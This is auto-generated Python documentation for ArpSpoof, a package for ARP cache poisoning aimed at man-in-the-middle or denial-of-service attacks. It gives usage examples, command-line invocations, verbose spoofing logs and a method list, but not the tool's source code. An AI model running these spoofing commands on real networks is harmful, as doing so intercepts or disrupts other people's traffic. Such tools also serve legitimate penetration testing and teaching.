Python: module ArpSpoof

ArpSpoof (version 1.1.1)

This package implements an ARP Spoofer for MIM (Man-In-the-Middle) or DoS (Denial of Service) attacks. >>> from scapy.all import conf >>> from ArpSpoof import SpooferARP PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. ArpSpoof Copyright (C) 2021, 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. >>> spoofer = SpooferARP('127.0.0.1', '127.0.0.2') >>> spoofer.active_cache_poisonning() [2022-06-22 11:13:25] WARNING (30) {ArpSpoof - ArpSpoof.py:323} Start ARP spoof... Gateway: 127.0.0.1 [ff:ff:ff:ff:ff:ff]. Targets: 127.0.0.2. Traceback (most recent call last): ... KeyboardInterrupt >>> spoofer = SpooferARP('127.0.0.1', '127.0.0.2,127.0.0.3') >>> spoofer.active_cache_poisonning() [2022-06-22 11:13:25] WARNING (30) {ArpSpoof - ArpSpoof.py:323} Start ARP spoof... Gateway: 127.0.0.1 [ff:ff:ff:ff:ff:ff]. Targets: 127.0.0.2, 127.0.0.3. Traceback (most recent call last): ... KeyboardInterrupt >>> spoofer = SpooferARP('127.0.0.1', '127.0.0.2-127.0.0.5') >>> spoofer.active_cache_poisonning() [2022-06-22 11:13:25] WARNING (30) {ArpSpoof - ArpSpoof.py:323} Start ARP spoof... Gateway: 127.0.0.1 [ff:ff:ff:ff:ff:ff]. Targets: 127.0.0.2, 127.0.0.3, 127.0.0.4. Traceback (most recent call last): ... KeyboardInterrupt >>> spoofer = SpooferARP('127.0.0.1', '127.0.0.0/30') >>> spoofer.active_cache_poisonning() [2022-06-22 11:13:25] WARNING (30) {ArpSpoof - ArpSpoof.py:323} Start ARP spoof... Gateway: 127.0.0.1 [ff:ff:ff:ff:ff:ff]. Targets: 127.0.0.1, 127.0.0.2. Traceback (most recent call last): ... KeyboardInterrupt >>> spoofer = SpooferARP('172.16.10.1', '172.16.0.35', conf.iface, False, 0.5) >>> spoofer.passive_cache_poisonning(asynchronous=True) [2022-06-22 11:13:25] WARNING (30) {ArpSpoof - ArpSpoof.py:380} Start passive ARP spoof... Gateway: 172.16.10.1 [None]. Targets: 172.16.0.35. >>> spoofer.run = False >>> spoofer.sniffer.stop() # only with asynchronous mode <Sniffed: TCP:0 UDP:0 ICMP:0 Other:0> >>> spoofer.restore() # only with asynchronous mode ~# python3 ArpSpoof.py 127.0.0.1 127.0.0.2 PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. ArpSpoof Copyright (C) 2021 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. [2022-06-22 11:12:13] WARNING (30) {__main__ - ArpSpoof.py:209} Start ARP spoof... Gateway: 127.0.0.1 [ff:ff:ff:ff:ff:ff]. Targets: 127.0.0.2. [2022-06-22 11:12:13] WARNING (30) {__main__ - ArpSpoof.py:471} End of ARP spoofing. Restore ARP table... [2022-06-22 11:13:25] CRITICAL (50) {__main__ - ArpSpoof.py:473} End of ARP spoofing. The ARP tables are restored. ~# python3 ArpSpoof.py -v 127.0.0.1 127.0.0.2,127.0.0.5 PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. ArpSpoof Copyright (C) 2021, 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:433} Logging is configured. [2022-06-22 11:12:13] INFO (20) {__main__ - ArpSpoof.py:435} Network interface is configured (IP: 169.254.155.222, MAC: e8:6a:64:bc:b5:fa and name: WiFi or WiFi) [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:151} Get IP and MAC addresses... [2022-06-22 11:12:13] INFO (20) {__main__ - ArpSpoof.py:160} Gateway: 127.0.0.1 [ff:ff:ff:ff:ff:ff] [2022-06-22 11:12:13] INFO (20) {__main__ - ArpSpoof.py:161} Spoof: 127.0.0.2, 127.0.0.5 [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:180} Start packets crafting for 127.0.0.2 [ff:ff:ff:ff:ff:ff]... [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:180} Start packets crafting for 127.0.0.5 [ff:ff:ff:ff:ff:ff]... [2022-06-22 11:12:13] INFO (20) {__main__ - ArpSpoof.py:194} Packets are built. [2022-06-22 11:12:13] WARNING (30) {__main__ - ArpSpoof.py:202} Start ARP spoof... Gateway: 127.0.0.1 [ff:ff:ff:ff:ff:ff]. Targets: 127.0.0.2, 127.0.0.5. [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:228} Send ARP packet to spoof target '127.0.0.2'... [2022-06-22 11:12:13] INFO (20) {__main__ - ArpSpoof.py:236} Spoof '127.0.0.2' for '127.0.0.1' [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:228} Send ARP packet to spoof target '127.0.0.5'... [2022-06-22 11:12:13] INFO (20) {__main__ - ArpSpoof.py:236} Spoof '127.0.0.5' for '127.0.0.1' [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:240} Send ARP packet to spoof gateway '127.0.0.1'... [2022-06-22 11:12:13] INFO (20) {__main__ - ArpSpoof.py:250} Spoof '127.0.0.1' for '127.0.0.2' [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:240} Send ARP packet to spoof gateway '127.0.0.1'... [2022-06-22 11:12:13] INFO (20) {__main__ - ArpSpoof.py:250} Spoof '127.0.0.1' for '127.0.0.5' [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:228} Send ARP packet to spoof target '127.0.0.2'... [2022-06-22 11:12:13] INFO (20) {__main__ - ArpSpoof.py:236} Spoof '127.0.0.2' for '127.0.0.1' [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:228} Send ARP packet to spoof target '127.0.0.5'... [2022-06-22 11:12:13] INFO (20) {__main__ - ArpSpoof.py:236} Spoof '127.0.0.5' for '127.0.0.1' [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:240} Send ARP packet to spoof gateway '127.0.0.1'... [2022-06-22 11:12:13] INFO (20) {__main__ - ArpSpoof.py:250} Spoof '127.0.0.1' for '127.0.0.2' [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:240} Send ARP packet to spoof gateway '127.0.0.1'... [2022-06-22 11:12:13] INFO (20) {__main__ - ArpSpoof.py:250} Spoof '127.0.0.1' for '127.0.0.5' [2022-06-22 11:12:13] WARNING (30) {__main__ - ArpSpoof.py:464} End of ARP spoofing. Restore ARP table... [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:337} Restoring ARP tables for the target... [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:345} Restore '127.0.0.1' for '127.0.0.2' (0/6)... [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:345} Restore '127.0.0.1' for '127.0.0.5' (0/6)... [2022-06-22 11:13:23] DEBUG (10) {__main__ - ArpSpoof.py:345} Restore '127.0.0.1' for '127.0.0.2' (1/6)... [2022-06-22 11:13:23] DEBUG (10) {__main__ - ArpSpoof.py:345} Restore '127.0.0.1' for '127.0.0.5' (1/6)... [2022-06-22 11:13:23] DEBUG (10) {__main__ - ArpSpoof.py:345} Restore '127.0.0.1' for '127.0.0.2' (2/6)... [2022-06-22 11:13:23] DEBUG (10) {__main__ - ArpSpoof.py:345} Restore '127.0.0.1' for '127.0.0.5' (2/6)... [2022-06-22 11:13:24] DEBUG (10) {__main__ - ArpSpoof.py:345} Restore '127.0.0.1' for '127.0.0.2' (3/6)... [2022-06-22 11:13:24] DEBUG (10) {__main__ - ArpSpoof.py:345} Restore '127.0.0.1' for '127.0.0.5' (3/6)... [2022-06-22 11:13:24] DEBUG (10) {__main__ - ArpSpoof.py:345} Restore '127.0.0.1' for '127.0.0.2' (4/6)... [2022-06-22 11:13:24] DEBUG (10) {__main__ - ArpSpoof.py:345} Restore '127.0.0.1' for '127.0.0.5' (4/6)... [2022-06-22 11:13:25] DEBUG (10) {__main__ - ArpSpoof.py:345} Restore '127.0.0.1' for '127.0.0.2' (5/6)... [2022-06-22 11:13:25] DEBUG (10) {__main__ - ArpSpoof.py:345} Restore '127.0.0.1' for '127.0.0.5' (5/6)... [2022-06-22 11:13:25] DEBUG (10) {__main__ - ArpSpoof.py:345} Restore '127.0.0.1' for '127.0.0.2' (6/6)... [2022-06-22 11:13:25] DEBUG (10) {__main__ - ArpSpoof.py:345} Restore '127.0.0.1' for '127.0.0.5' (6/6)... [2022-06-22 11:13:25] CRITICAL (50) {__main__ - ArpSpoof.py:466} End of ARP spoofing. The ARP tables are restored. ~# python3 ArpSpoof.py 127.0.0.1 127.0.0.2-127.0.0.5 PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. ArpSpoof Copyright (C) 2021, 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. [2022-06-22 11:12:13] WARNING (30) {__main__ - ArpSpoof.py:202} Start ARP spoof... Gateway: 127.0.0.1 [ff:ff:ff:ff:ff:ff]. Targets: 127.0.0.2, 127.0.0.3, 127.0.0.4. [2022-06-22 11:12:13] WARNING (30) {__main__ - ArpSpoof.py:464} End of ARP spoofing. Restore ARP table... [2022-06-22 11:13:25] CRITICAL (50) {__main__ - ArpSpoof.py:466} End of ARP spoofing. The ARP tables are restored. ~# python3 ArpSpoof.py 127.0.0.1 -t 1 127.0.0.0/29 PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. ArpSpoof Copyright (C) 2021, 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. [2022-06-22 11:12:13] WARNING (30) {__main__ - ArpSpoof.py:202} Start ARP spoof... Gateway: 127.0.0.1 [ff:ff:ff:ff:ff:ff]. Targets: 127.0.0.1, 127.0.0.2, 127.0.0.3, 127.0.0.4, 127.0.0.5, 127.0.0.6. [2022-06-22 11:12:13] WARNING (30) {__main__ - ArpSpoof.py:464} End of ARP spoofing. Restore ARP table... [2022-06-22 11:13:25] CRITICAL (50) {__main__ - ArpSpoof.py:466} End of ARP spoofing. The ARP tables are restored. ~# python ArpSpoof.py 127.0.0.1 127.0.0.2,127.0.0.3 -p -s -v -t 1 -i 127.0.0. PythonToolsKit Copyright (C) 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. ArpSpoof Copyright (C) 2021, 2022 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:541} Logging is configured. [2022-06-22 11:12:13] INFO (20) {__main__ - ArpSpoof.py:543} Network interface is configured (IP: , MAC: and name: loopback or loopback) [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:243} Get IP and MAC addresses... [2022-06-22 11:12:13] INFO (20) {__main__ - ArpSpoof.py:252} Gateway: 127.0.0.1 [ff:ff:ff:ff:ff:ff] [2022-06-22 11:12:13] INFO (20) {__main__ - ArpSpoof.py:253} Spoof: 127.0.0.2, 127.0.0.3 [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:272} Start packets crafting for 127.0.0.2 [ff:ff:ff:ff:ff:ff]... [2022-06-22 11:12:13] DEBUG (10) {__main__ - ArpSpoof.py:272} Start packets crafting for 127.0.0.3 [ff:ff:ff:ff:ff:ff]... [2022-06-22 11:12:13] INFO (20) {__main__ - ArpSpoof.py:286} Packets are built. [2022-06-22 11:12:13] WARNING (30) {__main__ - ArpSpoof.py:351} Start passive ARP spoof... Gateway: 127.0.0.1 [ff:ff:ff:ff:ff:ff]. Targets: 127.0.0.2, 127.0.0.3. [2022-06-22 11:12:15] INFO (20) {__main__ - ArpSpoof.py:399} Spoof 127.0.0.1 for 127.0.0.3 [2022-06-22 11:12:15] INFO (20) {__main__ - ArpSpoof.py:399} Spoof 127.0.0.1 for 127.0.0.3 [2022-06-22 11:12:16] INFO (20) {__main__ - ArpSpoof.py:406} Spoof 127.0.0.2 for 127.0.0.1 [2022-06-22 11:12:16] INFO (20) {__main__ - ArpSpoof.py:406} Spoof 127.0.0.2 for 127.0.0.1 [2022-06-22 11:12:16] DEBUG (10) {__main__ - ArpSpoof.py:445} Restoring ARP tables... [2022-06-22 11:12:16] DEBUG (10) {__main__ - ArpSpoof.py:453} Restore '127.0.0.1' for '127.0.0.2' (0/6)... [2022-06-22 11:12:16] DEBUG (10) {__main__ - ArpSpoof.py:453} Restore '127.0.0.1' for '127.0.0.3' (0/6)... [2022-06-22 11:12:17] DEBUG (10) {__main__ - ArpSpoof.py:453} Restore '127.0.0.1' for '127.0.0.2' (1/6)... [2022-06-22 11:12:17] DEBUG (10) {__main__ - ArpSpoof.py:453} Restore '127.0.0.1' for '127.0.0.3' (1/6)... [2022-06-22 11:12:18] DEBUG (10) {__main__ - ArpSpoof.py:453} Restore '127.0.0.1' for '127.0.0.2' (2/6)... [2022-06-22 11:12:18] DEBUG (10) {__main__ - ArpSpoof.py:453} Restore '127.0.0.1' for '127.0.0.3' (2/6)... [2022-06-22 11:12:18] DEBUG (10) {__main__ - ArpSpoof.py:453} Restore '127.0.0.1' for '127.0.0.2' (3/6)... [2022-06-22 11:12:18] DEBUG (10) {__main__ - ArpSpoof.py:453} Restore '127.0.0.1' for '127.0.0.3' (3/6)... [2022-06-22 11:12:19] DEBUG (10) {__main__ - ArpSpoof.py:453} Restore '127.0.0.1' for '127.0.0.2' (4/6)... [2022-06-22 11:12:19] DEBUG (10) {__main__ - ArpSpoof.py:453} Restore '127.0.0.1' for '127.0.0.3' (4/6)... [2022-06-22 11:12:19] DEBUG (10) {__main__ - ArpSpoof.py:453} Restore '127.0.0.1' for '127.0.0.2' (5/6)... [2022-06-22 11:12:19] DEBUG (10) {__main__ - ArpSpoof.py:453} Restore '127.0.0.1' for '127.0.0.3' (5/6)... [2022-06-22 11:12:20] DEBUG (10) {__main__ - ArpSpoof.py:453} Restore '127.0.0.1' for '127.0.0.2' (6/6)... [2022-06-22 11:12:20] DEBUG (10) {__main__ - ArpSpoof.py:453} Restore '127.0.0.1' for '127.0.0.3' (6/6)... [2022-06-22 11:12:20] WARNING (30) {__main__ - ArpSpoof.py:572} End of ARP spoofing. Restore ARP table...

Classes



builtins.object

SpooferARP

class SpooferARP(builtins.object)

    SpooferARP(gateway: str, targets: str, iface: scapy.interfaces.NetworkInterface = <NetworkInterface_Win Intel(R) Ethernet Connection (4) I219-V [UP+RUNNING+DISCONNECTED]>, semi: bool = False, inter: float = 0.5) This class implements a arp spoofer.

Methods defined here:

__init__(self, gateway: str, targets: str, iface: scapy.interfaces.NetworkInterface = <NetworkInterface_Win Intel(R) Ethernet Connection (4) I219-V [UP+RUNNING+DISCONNECTED]>, semi: bool = False, inter: float = 0.5)
Initialize self.  See help(type(self)) for accurate signature.

active_cache_poisonning(self) -> None
This function start active ARP cache poisonning attack.

active_spoof(self) -> None
This function send spoofed packets in active cache poisonning attack.

build_packets(self) -> None
This function crafts packets.

filter(self, packet: scapy.packet.Packet, mac_addresses: ValuesView = ()) -> bool
This function implements a filter for passive attack.

passive_cache_poisonning(self, asynchronous: bool = False) -> None
This function implements a passive cache poisonning attack.

passive_spoof(self, packet: scapy.packet.Packet) -> None
This function spoofs ARP in passive mode.

restore(self) -> None
This function restore ARP tables after ARP cache poisonning.

Data descriptors defined here:

__dict__

dictionary for instance variables (if defined)

__weakref__

list of weak references to the object (if defined)

Data

__all__ = ['SpooferARP']
__annotations__ = {'conf_iface': <class 'scapy.interfaces.NetworkInterface'>, 'logger': <class 'logging.Logger'>, 'logger_critical': <class 'collections.abc.Callable'>, 'logger_debug': <class 'collections.abc.Callable'>, 'logger_error': <class 'collections.abc.Callable'>, 'logger_info': <class 'collections.abc.Callable'>, 'logger_warning': <class 'collections.abc.Callable'>}
__author_email__ = 'mauricelambert434@gmail.com'
__copyright__ = '\nArpSpoof Copyright (C) 2021, 2022 Maurice Lam...ome to redistribute it\nunder certain conditions.\n'
__description__ = '\nThis package implements an ARP Spoofer for MIM\n...-the-Middle) or DoS (Denial of Service) attacks.\n'
__license__ = 'GPL-3.0 License'
__maintainer__ = 'Maurice Lambert'
__maintainer_email__ = 'mauricelambert434@gmail.com'
__url__ = 'https://github.com/mauricelambert/ArpSpoof'

Author

Maurice Lambert

Data
		__all__ = ['SpooferARP'] __annotations__ = {'conf_iface': <class 'scapy.interfaces.NetworkInterface'>, 'logger': <class 'logging.Logger'>, 'logger_critical': <class 'collections.abc.Callable'>, 'logger_debug': <class 'collections.abc.Callable'>, 'logger_error': <class 'collections.abc.Callable'>, 'logger_info': <class 'collections.abc.Callable'>, 'logger_warning': <class 'collections.abc.Callable'>} __author_email__ = 'mauricelambert434@gmail.com' __copyright__ = '\nArpSpoof Copyright (C) 2021, 2022 Maurice Lam...ome to redistribute it\nunder certain conditions.\n' __description__ = '\nThis package implements an ARP Spoofer for MIM\n...-the-Middle) or DoS (Denial of Service) attacks.\n' __license__ = 'GPL-3.0 License' __maintainer__ = 'Maurice Lambert' __maintainer_email__ = 'mauricelambert434@gmail.com' __url__ = 'https://github.com/mauricelambert/ArpSpoof'